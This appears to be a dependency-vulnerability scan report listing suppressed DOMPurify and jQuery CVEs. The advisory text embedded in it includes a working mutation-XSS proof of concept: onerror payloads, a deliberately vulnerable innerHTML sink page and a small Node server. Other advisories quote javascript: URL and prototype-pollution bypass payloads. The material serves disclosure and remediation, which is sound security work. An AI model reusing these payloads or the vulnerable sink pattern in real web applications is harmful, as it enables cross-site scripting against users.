**MD5:** 44cb08e002fca06cb52f0a998a34b913

**SHA1:** 55458cdd3c063b96d82693d141f535f61e280341

**SHA256:** b21ab51f48963e96600868f198137d44fac2d2f4a932d90104ffb11ab80b5544

**Referenced In Project/Scope:** server

#### Evidence



#### Suppressed Identifiers

- None

#### Suppressed Vulnerabilities



##### [CVE-2026-0540](#) suppressed

DOMPurify 3.1.3 through 3.3.1 and 2.5.3 through 2.5.8, fixed in commit 2726c74, contain a cross-site scripting vulnerability that allows attackers to bypass attribute sanitization by exploiting five missing rawtext elements (noscript, xmp, noembed, noframes, iframe) in the SAFE\_FOR\_XML regex. Attackers can include payloads like `</noscript><img src=x onerror=alert(1)>` in attribute values to execute JavaScript when sanitized output is placed inside these unprotected rawtext contexts.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

##### CVSSv4:

- MEDIUM (5.3)
- CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

##### CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

#### References:

- help@fluidattacks.com - <https://fluidattacks.com/advisories/daft>
- help@fluidattacks.com - <https://github.com/cure53/DOMPurify/commit/302b51de22535cc90235472c52e3401bedd46f80>
- help@fluidattacks.com - <https://github.com/cure53/DOMPurify/releases/tag/3.3.2>

- help@fluidattacks.com - [PRODUCT](#)
- help@fluidattacks.com - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/cure53/DOMPurify/commit/fca0a938b4261ddc9c0293a289935a9029c049f5>
- info - <https://www.vulncheck.com/advisories/dompurify-xss-via-missing-rawtext-elements-in-safe-for-xml>
- info - <https://www.vulncheck.com/advisories/dompurify-xss-via-missing-rawtext-elements-in-safe-for-xml>

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:cure53:dompurify:\*:\*:\*:\*:\* versions from (including) 2.5.3; versions up to (including) 2.5.8
- cpe:2.3:a:cure53:dompurify:\*:\*:\*:\*:\* versions from (including) 3.1.3; versions up to (including) 3.3.1

#### [CVE-2025-15599](#) suppressed

DOMPurify 3.1.3 through 3.2.6 and 2.5.3 through 2.5.8 contain a cross-site scripting vulnerability that allows attackers to bypass attribute sanitization by exploiting missing textarea rawtext element validation in the SAFE\_FOR\_XML regex. Attackers can include closing rawtext tags like </textarea> in attribute values to break out of rawtext contexts and execute JavaScript when sanitized output is placed inside rawtext elements. The 3.x branch was fixed in 3.2.7; the 2.x branch was never patched.

#### CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

#### CVSSv4:

- MEDIUM (5.1)
- CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

#### CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

#### References:

- disclosure@vulncheck.com - [PATCH](#)
- disclosure@vulncheck.com - [PRODUCT](#)
- disclosure@vulncheck.com - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/cure53/DOMPurify/commit/c861f5a83fb8d90800f1680f855fee551161ac2b>
- info - <https://www.vulncheck.com/advisories/dompurify-xss-via-textarea-rawtext-bypass-in-safe-for-xml>
- info - <https://www.vulncheck.com/advisories/dompurify-xss-via-textarea-rawtext-bypass-in-safe-for-xml>

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:cure53:dompurify:\*:\*:\*:\*:\* versions from (including) 2.5.3; versions up to (including) 2.5.8
- cpe:2.3:a:cure53:dompurify:\*:\*:\*:\*:\* versions from (including) 3.1.3; versions up to (excluding) 3.2.7

**## Description** A mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using ``innerHTML`` and special wrappers. The vulnerable wrappers confirmed in browser behavior are ``script``, ``xmp``, ``iframe``, ``noembed``, ``noframes``, and ``noscript``. The payload remains seemingly benign after ``DOMPurify.sanitize()``, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (``alert(1)`` in the PoC). **## Vulnerability** The root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, ``<xmp> ... </xmp>`` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example ``</xmp>`` or equivalent closing

sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (<img ... onerror=...>) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern). ## PoC 1. Start the PoC app: ``bash npm install npm start `` 2. Open `http://localhost:3001`. 3. Set `Wrapper en sink` to `xmp`. 4. Use payload: ``html <img src=x alt="</xmp><img src=x onerror=alert('expoc')">`` 5. Click `Sanitize + Render`. 6. Observe: - `Sanitized response` still contains the `</xmp>` sequence inside `alt`. - The sink reparses to include ``. - `alert('expoc')` is triggered. 7. Files: - index.html ``html <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>expoc - DOMPurify SSR PoC</title> <style> :root { --bg: #f7f8fb; --panel: #ffffff; --line: #d8dce6; --text: #0f172a; --muted: #475569; --accent: #0ea5e9; } \* { box-sizing: border-box; } body { margin: 0; font-family: "SF Mono", Menlo, Consolas, monospace; color: var(--text); background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%); } main { max-width: 980px; margin: 28px auto; padding: 0 16px 20px; } h1 { margin: 0 0 10px; font-size: 1.45rem; } p { margin: 0; color: var(--muted); } .grid { display: grid; gap: 14px; margin-top: 16px; } .card { background: var(--panel); border: 1px solid var(--line); border-radius: 12px; padding: 14px; } label { display: block; margin-bottom: 7px; font-size: 0.85rem; color: var(--muted); } textarea, input, select, button { width: 100%; border: 1px solid var(--line); border-radius: 8px; padding: 9px 10px; font: inherit; background: #fff; } textarea { min-height: 110px; resize: vertical; } .row { display: grid; grid-template-columns: 1fr 230px; gap: 12px; } button { cursor: pointer; background: var(--accent); color: #fff; border-color: #0284c7; } #sink { min-height: 90px; border: 1px dashed #94a3b8; border-radius: 8px; padding: 10px; background: #f8fafc; } pre { margin: 0; white-space: pre-wrap; word-break: break-word; } .note { margin-top: 8px; font-size: 0.85rem; } .status-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(180px, 1fr)); gap: 8px; margin-top: 10px; } .status-item { border: 1px solid var(--line); border-radius: 8px; padding: 8px 10px; font-size: 0.85rem; background: #fff; } .status-item.vuln { border-color: #ef4444; background: #fef2f2; } .status-item.safe { border-color: #22c55e; background: #f0fdf4; } @media (max-width: 760px) { .row { grid-template-columns: 1fr; } } </style> </head> <body> <main> <h1>expoc - DOMPurify Server-Side PoC</h1> <p> Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con innerHTML. </p> <div class="grid"> <section class="card"> <label for="payload">Payload</label> <textarea id="payload"><img src=x alt="</script><img src=x onerror=alert('expoc')"></textarea> <div class="row" style="margin-top: 10px;"> <div> <label for="wrapper">Wrapper en sink</label> <select id="wrapper"> <option value="div">div</option> <option value="textarea">textarea</option> <option value="title">title</option> <option value="style">style</option> <option value="script" selected>script</option> <option value="xmp">xmp</option> <option value="iframe">iframe</option> <option value="noembed">noembed</option> <option value="noframes">noframes</option> <option value="noscript">noscript</option> </select> </div> <div style="display:flex;align-items:end;"> <button id="run" type="button">Sanitize + Render</button> </div> </div> <p class="note">Se usa render vulnerable: <code>sink.innerHTML = '&lt;wrapper&gt;' + sanitized + '&lt;/wrapper&gt;';</code>.</p> <div class="status-grid"> <div class="status-item vuln">script (vulnerable)</div> <div class="status-item vuln">xmp (vulnerable)</div> <div class="status-item vuln">iframe (vulnerable)</div> <div class="status-item vuln">noembed (vulnerable)</div> <div class="status-item vuln">noframes (vulnerable)</div> <div class="status-item vuln">noscript (vulnerable)</div> <div class="status-item safe">div (no vulnerable)</div> <div class="status-item safe">textarea (no vulnerable)</div> <div class="status-item safe">title (no vulnerable)</div> <div class="status-item safe">style (no vulnerable)</div> </div> </section> <section class="card"> <label>Sanitized response</label> <pre id="sanitized">(empty)</pre> </section> <section class="card"> <label>Sink</label> <div id="sink"></div> </section> </div> </main> <script> const payload = document.getElementById('payload'); const wrapper = document.getElementById('wrapper'); const run = document.getElementById('run'); const sanitizedNode = document.getElementById('sanitized'); const sink = document.getElementById('sink'); run.addEventListener('click', async () => { const response = await fetch('/sanitize', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ input: payload.value }) }); const data = await response.json(); const sanitized = data.sanitized || ''; const w = wrapper.value; sanitizedNode.textContent = sanitized; sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>'; }); </script> </body> </html> `` - server.js ``js const express = require('express'); const path = require('path'); const { JSDOM } = require('jsdom'); const createDOMPurify = require('dompurify'); const app = express(); const port = process.env.PORT || 3001; const window = new JSDOM('').window; const DOMPurify = createDOMPurify(window); app.use(express.json()); app.use

```
(express.static(path.join(__dirname, 'public'))); app.get('/health', (_req, res) => { res.json({
ok: true, service: 'expoc' }); }); app.post('/sanitize', (req, res) => { const input = typeof req.
body?.input === 'string' ? req.body.input : ""; const sanitized = DOMPurify.sanitize(input);
res.json({ sanitized }); }); app.listen(port, () => { console.log(`expoc running at
http://localhost:${port}`); }); ``` - package.json ```json { "name": "expoc", "version":
"1.0.0", "main": "server.js", "scripts": { "test": "echo \"Error: no test specified\" && exit
1", "start": "node server.js", "dev": "node server.js" }, "keywords": [], "author": "",
"license": "ISC", "description": "", "dependencies": { "dompurify": "^3.3.1", "express":
"^5.2.1", "jsdom": "^28.1.0" } } ``` ## Evidence - PoC [daft-video.webm](https://github.com
/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90) - XSS triggered  ## Why This Happens This is a
mutation-XSS pattern caused by a parse-context mismatch: - Parse 1 (sanitization
phase): input is interpreted under normal HTML parsing rules. - Parse 2 (sink phase):
sanitized output is embedded into a wrapper that changes parser state ( `xmp` raw-text
behavior). - Attacker-controlled sequence ( `</xmp>` ) gains structural meaning in parse 2
and alters DOM structure. Sanitization is not a universal guarantee across all future
parsing contexts. The sink design reintroduces risk. ## Remediation Guidance 1. Do not
concatenate sanitized strings into new HTML wrappers followed by `innerHTML`. 2. Keep
the rendering context stable from sanitize to sink. 3. Prefer DOM-safe APIs ( `textContent`,
`createElement`, `setAttribute` ) over string-based HTML composition. 4. If HTML insertion
is required, sanitize as close as possible to final insertion context and avoid wrapper
constructs with raw-text semantics ( `xmp`, `script`, etc.). 5. Add regression tests for
context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout
markers). Reported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera
and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-
Contextualization in DomPurify 3.3.1. Following Fluid Attacks [Disclosure Policy]
(https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability
and the conditions outlined in the policy are met, this advisory will be published on the
website over the next few days (the timeline may vary depending on maintainers'
willingness to attend to and respond to this report) at the following URL:
https://fluidattacks.com/advisories/daft Acknowledgements: [Camilo Vera](https://github.
com/caverav/) and [Cristian Vargas](https://github.com/tachote). (RETIREJS) suppressed
```

## ## Description

A mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC).

## ## Vulnerability

The root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup ( `<img ... onerror=...>` ) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern).

## ## PoC

1. Start the PoC app:

```
```bash
npm install
npm start
```
```

2. Open `http://localhost:3001`.

3. Set `Wrapper en sink` to `xmp`.

4. Use payload:

```
```html
<img src=x alt="</xmp><img src=x onerror=alert('expoc')>">
```

...

5. Click `Sanitize + Render`.

6. Observe:

- `Sanitized response` still contains the `</xmp>` sequence inside `alt`.
- The sink reparses to include `- `alert('expoc')` is triggered.

7. Files:

- index.html

```html

<!doctype html>

<html lang="en">

<head>

<meta charset="utf-8">

<meta name="viewport" content="width=device-width, initial-scale=1">

<title>expoc - DOMPurify SSR PoC</title>

<style>

:root {

--bg: #f7f8fb;

--panel: #ffffff;

--line: #d8dce6;

--text: #0f172a;

--muted: #475569;

--accent: #0ea5e9;

}

\* {

box-sizing: border-box;

}

body {

margin: 0;

font-family: "SF Mono", Menlo, Consolas, monospace;

color: var(--text);

background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%);

}

main {

max-width: 980px;

margin: 28px auto;

padding: 0 16px 20px;

}

h1 {

margin: 0 0 10px;

font-size: 1.45rem;

}

p {

margin: 0;

color: var(--muted);

}

.grid {

display: grid;

gap: 14px;

margin-top: 16px;

}

.card {

background: var(--panel);

border: 1px solid var(--line);

border-radius: 12px;

padding: 14px;

}

label {



```
display: block;
margin-bottom: 7px;
font-size: 0.85rem;
color: var(--muted);
}

textarea,
input,
select,
button {
width: 100%;
border: 1px solid var(--line);
border-radius: 8px;
padding: 9px 10px;
font: inherit;
background: #fff;
}

textarea {
min-height: 110px;
resize: vertical;
}

.row {
display: grid;
grid-template-columns: 1fr 230px;
gap: 12px;
}

button {
cursor: pointer;
background: var(--accent);
color: #fff;
border-color: #0284c7;
}

#sink {
min-height: 90px;
border: 1px dashed #94a3b8;
border-radius: 8px;
padding: 10px;
background: #f8fafc;
}

pre {
margin: 0;
white-space: pre-wrap;
word-break: break-word;
}

.note {
margin-top: 8px;
font-size: 0.85rem;
}

.status-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(180px, 1fr));
gap: 8px;
margin-top: 10px;
}

.status-item {
border: 1px solid var(--line);
border-radius: 8px;
padding: 8px 10px;
font-size: 0.85rem;
background: #fff;
```

```

}

.status-item.vuln {
  border-color: #ef4444;
  background: #fef2f2;
}

.status-item.safe {
  border-color: #22c55e;
  background: #f0fdf4;
}

@media (max-width: 760px) {
  .row {
    grid-template-columns: 1fr;
  }
}
</style>
</head>
<body>
<main>
<h1>expoc - DOMPurify Server-Side PoC</h1>
<p>
  Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con
  innerHTML.
</p>

<div class="grid">
  <section class="card">
    <label for="payload">Payload</label>
    <textarea id="payload"><img src=x alt="</script><img src=x onerror=alert('expoc')>"><
  /textarea>
    <div class="row" style="margin-top: 10px;">
      <div>
        <label for="wrapper">Wrapper en sink</label>
        <select id="wrapper">
          <option value="div">div</option>
          <option value="textarea">textarea</option>
          <option value="title">title</option>
          <option value="style">style</option>
          <option value="script" selected>script</option>
          <option value="xmp">xmp</option>
          <option value="iframe">iframe</option>
          <option value="noembed">noembed</option>
          <option value="noframes">noframes</option>
          <option value="noscript">noscript</option>
        </select>
      </div>
      <div style="display:flex;align-items:end;">
        <button id="run" type="button">Sanitize + Render</button>
      </div>
    </div>
    <p class="note">Se usa render vulnerable: <code>sink.innerHTML = '&lt;wrapper&gt;' +
    sanitized + '&lt;/wrapper&gt;';</code>.</p>
    <div class="status-grid">
      <div class="status-item vuln">script (vulnerable)</div>
      <div class="status-item vuln">xmp (vulnerable)</div>
      <div class="status-item vuln">iframe (vulnerable)</div>
      <div class="status-item vuln">noembed (vulnerable)</div>
      <div class="status-item vuln">noframes (vulnerable)</div>
      <div class="status-item vuln">noscript (vulnerable)</div>
      <div class="status-item safe">div (no vulnerable)</div>
      <div class="status-item safe">textarea (no vulnerable)</div>
      <div class="status-item safe">title (no vulnerable)</div>
      <div class="status-item safe">style (no vulnerable)</div>
    </div>
  </section>

```

```

<section class="card">
  <label>Sanitized response</label>
  <pre id="sanitized">(empty)</pre>
</section>

<section class="card">
  <label>Sink</label>
  <div id="sink"></div>
</section>
</div>
</main>

<script>
const payload = document.getElementById('payload');
const wrapper = document.getElementById('wrapper');
const run = document.getElementById('run');
const sanitizedNode = document.getElementById('sanitized');
const sink = document.getElementById('sink');

run.addEventListener('click', async () => {
  const response = await fetch('/sanitize', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ input: payload.value })
  });

  const data = await response.json();
  const sanitized = data.sanitized || "";
  const w = wrapper.value;

  sanitizedNode.textContent = sanitized;
  sink.innerHTML = '<' + w + '>' + sanitized + '<' + w + '>';
});
</script>
</body>
</html>
``

```

- server.js

```

``js
const express = require('express');
const path = require('path');
const { JSDOM } = require('jsdom');
const createDOMPurify = require('dompurify');

const app = express();
const port = process.env.PORT || 3001;

const window = new JSDOM("").window;
const DOMPurify = createDOMPurify(window);

app.use(express.json());
app.use(express.static(path.join(__dirname, 'public')));

app.get('/health', (_req, res) => {
  res.json({ ok: true, service: 'expoc' });
});

app.post('/sanitize', (req, res) => {
  const input = typeof req.body?.input === 'string' ? req.body.input : "";
  const sanitized = DOMPurify.sanitize(input);
  res.json({ sanitized });
});

app.listen(port, () => {
  console.log(`expoc running at http://localhost:${port}`);
});

```

...

- package.json

```
{}json
{
  "name": "expoc",
  "version": "1.0.0",
  "main": "server.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "start": "node server.js",
    "dev": "node server.js"
  },
  "keywords": [],
  "author": "",
  "license": "ISC",
  "description": "",
  "dependencies": {
    "dompurify": "^3.3.1",
    "express": "^5.2.1",
    "jsdom": "^28.1.0"
  }
}
```

## ## Evidence

- PoC

[daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90)

- XSS triggered

```

```

## ## Why This Happens

This is a mutation-XSS pattern caused by a parse-context mismatch:

- Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules.
- Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state ( `xmp` raw-text behavior).
- Attacker-controlled sequence ( `</xmp>` ) gains structural meaning in parse 2 and alters DOM structure.

Sanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk.

## ## Remediation Guidance

1. Do not concatenate sanitized strings into new HTML wrappers followed by `innerHTML`.
2. Keep the rendering context stable from sanitize to sink.
3. Prefer DOM-safe APIs ( `textContent`, `createElement`, `setAttribute` ) over string-based HTML composition.
4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics ( `xmp`, `script`, etc.).
5. Add regression tests for context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout markers).

Reported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1.

Following Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: <https://fluidattacks.com/advisories/daft>

Acknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote).

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- githubID - GHSA-h8r8-wccr-v5f2
- info - <https://github.com/cure53/DOMPurify/releases/tag/3.3.2>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2>

Vulnerable Software & Versions (RETIREJS):

**## Summary** DOMPurify allows ``ADD_ATTR`` to be provided as a predicate function via ``EXTRA_ELEMENT_HANDLING.attributeCheck``. When the predicate returns ``true``, ``_isValidAttribute`` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as ``<a href="javascript:alert(document.domain)">`` and have the ``javascript:`` URL survive, because URI validation is skipped for that attribute while other checks still pass. The provided PoC accepts ``href`` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass. **## Impact** Predicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as ``javascript:`` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS. **## Credits** Identified by Cantina's Apex (<https://www.cantina.security>). (RETIREJS) suppressed

**## Summary**

DOMPurify allows ``ADD_ATTR`` to be provided as a predicate function via ``EXTRA_ELEMENT_HANDLING.attributeCheck``. When the predicate returns ``true``, ``_isValidAttribute`` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as ``<a href="javascript:alert(document.domain)">`` and have the ``javascript:`` URL survive, because URI validation is skipped for that attribute while other checks still pass. The provided PoC accepts ``href`` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass.

**## Impact**

Predicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as ``javascript:`` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS.

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Identified by Cantina's Apex (<https://www.cantina.security>).

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- githubID - GHSA-cjmm-f4jc-qw8r
- info - <https://github.com/cure53/DOMPurify/releases/tag/3.3.2>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-cjmm-f4jc-qw8r>

Vulnerable Software & Versions (RETIREJS):

**## Summary** In ``src/purify.ts:1117-1123``, ``ADD_TAGS`` as a function (via ``EXTRA_ELEMENT_HANDLING.tagCheck``) bypasses ``FORBID_TAGS`` due to short-circuit evaluation. The condition: ``!!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])`` When ``tagCheck(tagName)`` returns ``true``, the entire condition is ``false`` and the element is kept — ``FORBID_TAGS[tagName]`` is never

evaluated. **## Inconsistency** This contradicts the attribute-side pattern at line 1214 where ``FORBID_ATTR`` explicitly wins first: ```` if (FORBID_ATTR[lcName]) { continue; } ```` For tags, `FORBID` should also take precedence over `ADD`. **## Impact** Applications using both ``ADD_TAGS`` as a function and ``FORBID_TAGS`` simultaneously get unexpected behavior — forbidden tags are allowed through. Config-dependent but a genuine logic inconsistency. **## Suggested Fix** Check ``FORBID_TAGS`` before ``tagCheck``: ```` if (FORBID_TAGS[tagName]) { /* remove */ } else if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ } ```` **## Affected Version** v3.3.3 (commit 883ac15) (RETIREJS)

suppressed

#### ## Summary

In ``src/purify.ts:1117-1123``, ``ADD_TAGS`` as a function (via ``EXTRA_ELEMENT_HANDLING.tagCheck``) bypasses ``FORBID_TAGS`` due to short-circuit evaluation.

The condition:

```

`!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])`

```

When ``tagCheck(tagName)`` returns ``true``, the entire condition is ``false`` and the element is kept — ``FORBID_TAGS[tagName]`` is never evaluated.

#### ## Inconsistency

This contradicts the attribute-side pattern at line 1214 where ``FORBID_ATTR`` explicitly wins first:

```

`if (FORBID_ATTR[lcName]) { continue; }`

```

For tags, `FORBID` should also take precedence over `ADD`.

#### ## Impact

Applications using both ``ADD_TAGS`` as a function and ``FORBID_TAGS`` simultaneously get unexpected behavior — forbidden tags are allowed through. Config-dependent but a genuine logic inconsistency.

#### ## Suggested Fix

Check ``FORBID_TAGS`` before ``tagCheck``:

```

`if (FORBID_TAGS[tagName]) { /* remove */ }`

`else if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ }`

```

#### ## Affected Version

v3.3.3 (commit 883ac15)

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- githubID - GHSA-39q2-94rc-95cp
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp>

Vulnerable Software & Versions (RETIREJS):

**## Summary** When ``USE_PROFILES`` is enabled, `DOMPurify` rebuilds ``ALLOWED_ATTR`` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via ``ALLOWED_ATTR[lcName]``, any ``Array.prototype`` property that is polluted also counts as an allowlisted attribute. An attacker who can set ``Array.prototype.onclick = true`` (or a runtime already subject to prototype pollution) can thus force `DOMPurify` to keep event handlers such as ``onclick`` even when they are normally forbidden. The provided PoC sanitizes ``<img onclick=...>`` with ``USE_PROFILES`` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector. **## Impact** Prototype pollution makes `DOMPurify` accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup



is rendered. **## Credits Identified by Cantina's Apex** (<https://www.cantina.security>).  
(RETIREJS) suppressed

#### ## Summary

When `USE\_PROFILES` is enabled, DOMPurify rebuilds `ALLOWED\_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via `ALLOWED\_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `` with `USE\_PROFILES` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector.

#### ## Impact

Prototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered.

#### ## Credits

Identified by Cantina's Apex (<https://www.cantina.security>).

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- githubID - GHSA-cj63-jhhr-wcxv
- info - <https://github.com/cure53/DOMPurify/releases/tag/3.3.2>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-cj63-jhhr-wcxv>

Vulnerable Software & Versions (RETIREJS):

**CVE-2026-41238** (RETIREJS) suppressed

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- info - <https://github.com/cure53/DOMPurify/releases/tag/3.4.0>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-v9jr-rg53-9pgp>

Vulnerable Software & Versions (RETIREJS):

**CVE-2026-41239** (RETIREJS) suppressed

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- info - <https://github.com/cure53/DOMPurify/releases/tag/3.4.0>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-crv5-9vww-q3g8>

Vulnerable Software & Versions (RETIREJS):

**CVE-2026-41240** (RETIREJS) suppressed

Notes: HugeRTE: There is currently no fixed date. <https://github.com/hugerte/hugerte/issues/128#issuecomment-4025527015>

Unscored:

- Severity: medium

References:

- info - <https://github.com/cure53/DOMPurify/releases/tag/3.4.0>
- info - <https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m>

Vulnerable Software & Versions (RETIREJS):

## remotegui.zip: jquery.jar

### Description:

WebJar for jQuery

### License:

MIT License: <https://github.com/jquery/jquery/blob/master/MIT-LICENSE.txt>

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/jquery.jar

**MD5:** 4af65e569248d8a2411f66498d720280

**SHA1:** c3dc40b1b5f24c56afa36fd9a463bb9f378ac4ab

**SHA256:** de28c4da0ea9f16101352dd3582ec8021ee5e2de5f45104ca171876003d54db6

**Referenced In Project/Scope:** server

### Evidence



### Suppressed Identifiers

- None

### Suppressed Vulnerabilities



**CVE-2016-10707** (OSSINDEX) suppressed

jquery - Uncontrolled Resource Consumption

Sonatype's research suggests that this CVE's details differ from those defined at NVD. See <https://ossindex.sonatype.org/vulnerability/CVE-2016-10707> for details

CWE-400 Uncontrolled Resource Consumption

Notes: file name: remotegui.jar: jquery.min.js - We can not yet upgrade to a newer version due to dependencies. We do, however, not directly use the functionality that is being CVEd

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

#### References:

- OSSINDEX - [\[CVE-2016-10707\] CWE-400: Uncontrolled Resource Consumption \('Resource Exhaustion'\)](#)
- OSSIndex - <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10707>
- OSSIndex - <https://github.com/advisories/GHSA-mhpp-875w-9cpv>
- OSSIndex - <https://github.com/jquery/jquery/issues/3133>
